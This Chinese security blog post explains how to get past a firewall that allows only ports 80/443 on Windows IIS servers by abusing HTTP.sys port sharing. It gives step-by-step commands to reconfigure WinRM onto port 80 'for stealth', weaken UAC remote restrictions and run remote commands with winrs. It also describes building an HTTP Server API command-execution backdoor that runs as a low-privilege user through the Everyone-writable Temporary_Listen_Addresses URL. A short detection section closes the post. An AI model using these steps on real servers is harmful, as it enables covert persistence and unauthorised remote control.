利用IIS的端口共享功能绕过防火墙

目录导航

0x00 前言

Windows服务器开启了IIS服务，防火墙仅允许80或443端口进行通信，那么如何在不使用webshell的前提下，实现对该服务器的远程管理？更进一步，如果只有低权限，有没有办法呢？

0x01 简介

本文将要介绍以下内容：

HTTP.sys和端口共享
WinRM服务
HTTP Server API
针对80和443端口的利用方法
针对高权限和低权限的利用方法
检测方法

0x02 基本概念

1.HTTP.sys和端口共享

微软在Windows 2003 Server加入了内核驱动程序(Http.sys)，用于侦听http流量并根据URL进行处理，允许任意用户进程共享专用于HTTP流量的TCP端口

也就是说，通过HTTP.sys，多个进程将能够侦听同一端口上的HTTP流量

可以使用Netsh命令来查询和配置HTTP.sys设置和参数，参考资料如下：

https://docs.microsoft.com/en-us/windows/win32/http/netsh-commands-for-http

列出所有URL的DACL，命令如下：

netsh http show urlacl

系统默认包括10个DACL，其中的两个对应WinRM服务，具体信息如下：

    Reserved URL            : http://+:5985/wsman/
        User: NT SERVICE\WinRM
            Listen: Yes
            Delegate: No
        User: NT SERVICE\Wecsvc
            Listen: Yes
            Delegate: No
            SDDL: D:(A;;GX;;;S-1-5-80-569256582-2953403351-2909559716-1301513147
-412116970)(A;;GX;;;S-1-5-80-4059739203-877974739-1245631912-527174227-299656351
7)

    Reserved URL            : https://+:5986/wsman/
        User: NT SERVICE\WinRM
            Listen: Yes
            Delegate: No
        User: NT SERVICE\Wecsvc
            Listen: Yes
            Delegate: No
            SDDL: D:(A;;GX;;;S-1-5-80-569256582-2953403351-2909559716-1301513147
-412116970)(A;;GX;;;S-1-5-80-4059739203-877974739-1245631912-527174227-299656351
7)

5985对应http的端口，5986对应https的端口

2.WinRM服务

学习资料：

https://docs.microsoft.com/en-us/windows/win32/winrm/portal

全称Windows Remote Management，能够实现在远程主机上执行命令

3.HTTP Server API

学习资料：

https://docs.microsoft.com/en-us/windows/win32/http/http-api-start-page

HTTP Server API使应用程序能够接收定向到URL的HTTP请求并发送HTTP响应

0x03 利用WinRM服务实现端口复用

注：

Twi1ight的文章已经介绍了这部分内容，感谢他的分享，地址如下：

https://paper.seebug.org/1004/

本节仅对此文章中的内容进行归纳整理并稍作补充

Windows Server 2008默认关闭WinRM服务，Windows Server 2012默认开启

注：

以下操作需要获得管理员权限

1.如果系统已开启WinRM服务

(1)查看监听配置

winrm e winrm/config/listener

默认监听5985端口，为了不修改默认配置，这里需要新增80端口

注：

查看WinRM配置的命令如下：

winrm get winrm/config

(2)新增80端口

winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}

补充：

删除80端口的命令如下:

winrm set winrm/config/service @{EnableCompatibilityHttpListener="false"}

注：

如果未新增80端口，远程连接需要指定5985端口，示例如下:

winrs -r:http://192.168.112.129:5985 -u:test -p:1234 "whoami"

(3)允许Administrators组中的所有帐户访问该服务

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

注：

如果不设置此项，远程连接时只能使用内置管理员帐户Administrator

2.如果系统未开启WinRM服务

(1)使用默认配置开启并配置服务

Winrm quickconfig -q

将自动执行以下操作：

启动WinRM服务，并将服务启动类型设置为自动启动
添加监听配置
添加防火墙规则

(2)修改默认端口

开启服务后，默认监听5985端口，为了更隐蔽，这里需要将默认端口5985修改为80端口

修改http默认端口为80：

winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}

注：

还原http默认端口为5985的命令如下：

winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="5985"}

(3)允许Administrators组中的所有帐户访问该服务

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

注：

如果不设置此项，远程连接时只能使用内置管理员帐户Administrator

3.通过WinRM服务连接远程主机

本地系统需要使用同远程主机相同的语言环境

(1)本地系统开启WinRM服务

Winrm quickconfig -q

(2)本地系统设置访问规则，允许连接所有主机

winrm set winrm/config/Client @{TrustedHosts="*"}

注：

删除该访问规则的命令如下：

winrm set winrm/config/Client @{TrustedHosts=""}

(3)连接远程主机的命令示例

如果为默认5985端口，命令如下：

winrs -r:http://192.168.112.129:5985 -u:administrator -p:1234 "whoami"

如果为80端口，命令如下：

winrs -r:http://192.168.112.129 -u:administrator -p:1234 "whoami"

0x04 利用HTTP Server API实现端口复用

1.示例代码测试

下载地址：

https://docs.microsoft.com/en-us/windows/win32/http/http-server-sample-application

代码支持同时注册多个URL，处理请求，发送HTTP响应

简单测试如下：

服务器IP为192.168.112.129

管理员权限执行：

http-server-sample-application.exe http://+:80/MyUri1 http://+:80/MyUri2

打开浏览器分别访问http://192.168.112.129:80/MyUri1和http://192.168.112.129:80/MyUri2

接收的结果如下图

示例代码通过API HttpAddUrl()将URL注册为Listen On，默认配置下，需要管理员权限才能添加成功，否则产生错误：HttpAddUrl failed with 5，提示权限不够

但可以通过添加url acl(需要管理员权限)的方式实现普通用户权限下的正常运行

2.通过添加url acl(需要管理员权限)的方式实现示例代码以普通用户权限运行

方法如下:

添加url acl，授予Everyone用户对指定URL的权限，命令如下(管理员权限):

netsh http add urlacl url=http://+:80/MyUri user=everyone

注：

删除该url acl的命令如下：

netsh http delete urlacl url=http://+:80/MyUri

再次执行测试程序(普通用户权限)，命令如下：

http-server-sample-application.exe http://+:80/MyUri

执行成功

3.借助已有的url acl实现示例代码以普通用户权限运行

列出所有URL的DACL，命令如下：

netsh http show urlacl

注意到默认配置下包含以下acl：

 Reserved URL            : http://+:80/Temporary_Listen_Addresses/
       User: \Everyone
           Listen: Yes
           Delegate: No
           SDDL: D:(A;;GX;;;WD)

User为Everyone，所以我们可以借助这个url

执行示例程序(普通用户权限)，命令如下：

http-server-sample-application.exe http://+:80/Temporary_Listen_Addresses/MyUri

执行成功

4.修改示例代码，实现命令执行

思路如下：

通过GET请求发送要执行的cmd命令，格式为?<command>

例如:http://192.168.112.129/MyUri?whoami，要执行的命令为whoami，在Response中回复执行的结果

对于不符合格式的GET和POST请求，在Response中回复404

实现代码：

以示例程序为模板，需要修改以下位置：

(1)使用?传入参数

pRequest->CookedUrl.pQueryString能够读取参数，但包括了无用的字符?，实际执行命令时需要去掉pRequest->CookedUrl.pQueryString的第一个字符

去掉pRequest->CookedUrl.pQueryString第一个字符的C代码如下：

WCHAR *QueryString = new WCHAR[pRequest->CookedUrl.QueryStringLength-1];
wcsncpy_s(QueryString, wcslen(QueryString), pRequest->CookedUrl.pQueryString + 1, wcslen(QueryString) - 1);
wprintf_s(L"%s\n", QueryString);

(2)特殊字符的替换

空格被转码为%20
“被转码为%22
‘被转码为%27

例如浏览器输入字符串whoami /all，会被转码为whoami%20/all，这条命令无法直接在命令行下执行

还原URL编码的C代码已上传至github，地址如下：

https://github.com/3gstudent/Homework-of-C-Language/blob/master/UrlDecode.cpp

代码支持多字节字符集和Unicode字符集

(3)使用管道读入命令并执行，回传结果

使用管道执行cmd命令并获取结果的代码已上传至github，地址如下：

https://github.com/3gstudent/Homework-of-C-Language/blob/master/UsePipeToExeCmd.cpp

(4)修改回传结果的格式

回传的结果需要作格式转换，\n换行符转换成html中的</br>，否则浏览器显示的内容无法换行

将文本中的换行符(\n)转换成html中换行符(</br>)的代码已上传至github，地址如下：

https://github.com/3gstudent/Homework-of-C-Language/blob/master/TextToHtmlofNewline.cpp

最终实现的代码已上传至github，地址如下：

https://github.com/3gstudent/Homework-of-C-Language/blob/master/HTTPServerWebshell.cpp

只有输入特定格式的url能够执行命令，否则提示404

如下图

命令实例：

http://192.168.112.129/MyUri?net%20start

如下图

https协议也支持，命令实例：

https://192.168.112.129/MyUri?net%20start

如下图

0x05 利用方法

Windows服务器开启了IIS服务，防火墙仅允许80或443端口进行通信，在不使用webshell的前提下，实现对该服务器远程管理的方法如下：

1.使用管理员权限

(1)使用WinRM服务

需要开启WinRM服务

需要Administrators组中的帐户口令或hash

(2)使用HTTP Server API

可以使用任意url

注：

80和443端口都可以

2.使用普通用户权限

(1)使用HTTP Server API

使用已有的url acl：http://+:80/Temporary_Listen_Addresses/

注：

无法使用443端口

0x06 检测方法

使用以下方法检测当前IIS服务器的端口共享功能是否被滥用

1.检测正在使用的url

如果使用了HTTP Server API，程序在运行时会注册url，查看命令如下：

netsh http sh ser

可疑结果示例：

Server session ID: D000000020000174
    Version: 1.0
    State: Active
    Properties:
        Max bandwidth: 4294967295
        Timeouts:
            Entity body timeout (secs): 120
            Drain entity body timeout (secs): 120
            Request queue timeout (secs): 120
            Idle connection timeout (secs): 120
            Header wait timeout (secs): 120
            Minimum send rate (bytes/sec): 150
    URL groups:
    URL group ID: AC0000004000017C
        State: Active
        Request queue name: Request queue is unnamed.
        Properties:
            Max bandwidth: inherited
            Max connections: inherited
            Timeouts:
                Timeout values inherited
            Number of registered URLs: 1
            Registered URLs:
                HTTP://192.168.112.129:80:192.168.112.129/MYURI/

Server session ID: D000000020000173
    Version: 1.0
    State: Active
    Properties:
        Max bandwidth: 4294967295
        Timeouts:
            Entity body timeout (secs): 120
            Drain entity body timeout (secs): 120
            Request queue timeout (secs): 120
            Idle connection timeout (secs): 120
            Header wait timeout (secs): 120
            Minimum send rate (bytes/sec): 150
    URL groups:
    URL group ID: AC0000004000017B
        State: Active
        Request queue name: Request queue is unnamed.
        Properties:
            Max bandwidth: inherited
            Max connections: inherited
            Timeouts:
                Timeout values inherited
            Number of registered URLs: 1
            Registered URLs:
                HTTPS://192.168.112.129:443:192.168.112.129/MYURI/
                
Server session ID: D600000020000077
    Version: 1.0
    State: Active
    Properties:
        Max bandwidth: 4294967295
        Timeouts:
            Entity body timeout (secs): 120
            Drain entity body timeout (secs): 120
            Request queue timeout (secs): 120
            Idle connection timeout (secs): 120
            Header wait timeout (secs): 120
            Minimum send rate (bytes/sec): 150
    URL groups:
    URL group ID: BF00000040000120
        State: Active
        Request queue name: Request queue is unnamed.
        Properties:
            Max bandwidth: inherited
            Max connections: inherited
            Timeouts:
                Timeout values inherited
            Number of registered URLs: 1
            Registered URLs:
                HTTP://+:80/TEMPORARY_LISTEN_ADDRESSES/

2.查看WinRM服务配置

如果攻击者获得了管理员权限，WinRM服务配置有可能被滥用

查看监听配置：

winrm e winrm/config/listener

查看是否开启可疑端口

0x07 小结

本文解决了如下问题：

Windows服务器开启了IIS服务，防火墙仅允许80或443端口进行通信，那么如何在不使用webshell，并且只有普通用户权限，实现对该服务器的远程管理？

解决方法:

使用代码：

https://github.com/3gstudent/Homework-of-C-Language/blob/master/HTTPServerWebshell.cpp

使用已有的url acl，命令参数如下：

HTTPServerWebshell.exe http://+:80/Temporary_Listen_Addresses/

from

0x00 前言

0x01 简介

0x02 基本概念

1.HTTP.sys和端口共享

2.WinRM服务

3.HTTP Server API

0x03 利用WinRM服务实现端口复用

1.如果系统已开启WinRM服务

(1)查看监听配置

(2)新增80端口

(3)允许Administrators组中的所有帐户访问该服务

2.如果系统未开启WinRM服务

(1)使用默认配置开启并配置服务

(2)修改默认端口

(3)允许Administrators组中的所有帐户访问该服务

3.通过WinRM服务连接远程主机

(1)本地系统开启WinRM服务

(2)本地系统设置访问规则，允许连接所有主机

(3)连接远程主机的命令示例

0x04 利用HTTP Server API实现端口复用

1.示例代码测试

2.通过添加url acl(需要管理员权限)的方式实现示例代码以普通用户权限运行

3.借助已有的url acl实现示例代码以普通用户权限运行

4.修改示例代码，实现命令执行

(1)使用?传入参数

(2)特殊字符的替换

(3)使用管道读入命令并执行，回传结果

(4)修改回传结果的格式

0x05 利用方法

1.使用管理员权限

(1)使用WinRM服务

(2)使用HTTP Server API

2.使用普通用户权限

(1)使用HTTP Server API

0x06 检测方法

1.检测正在使用的url

2.查看WinRM服务配置

0x07 小结

Leave a Reply 取消回复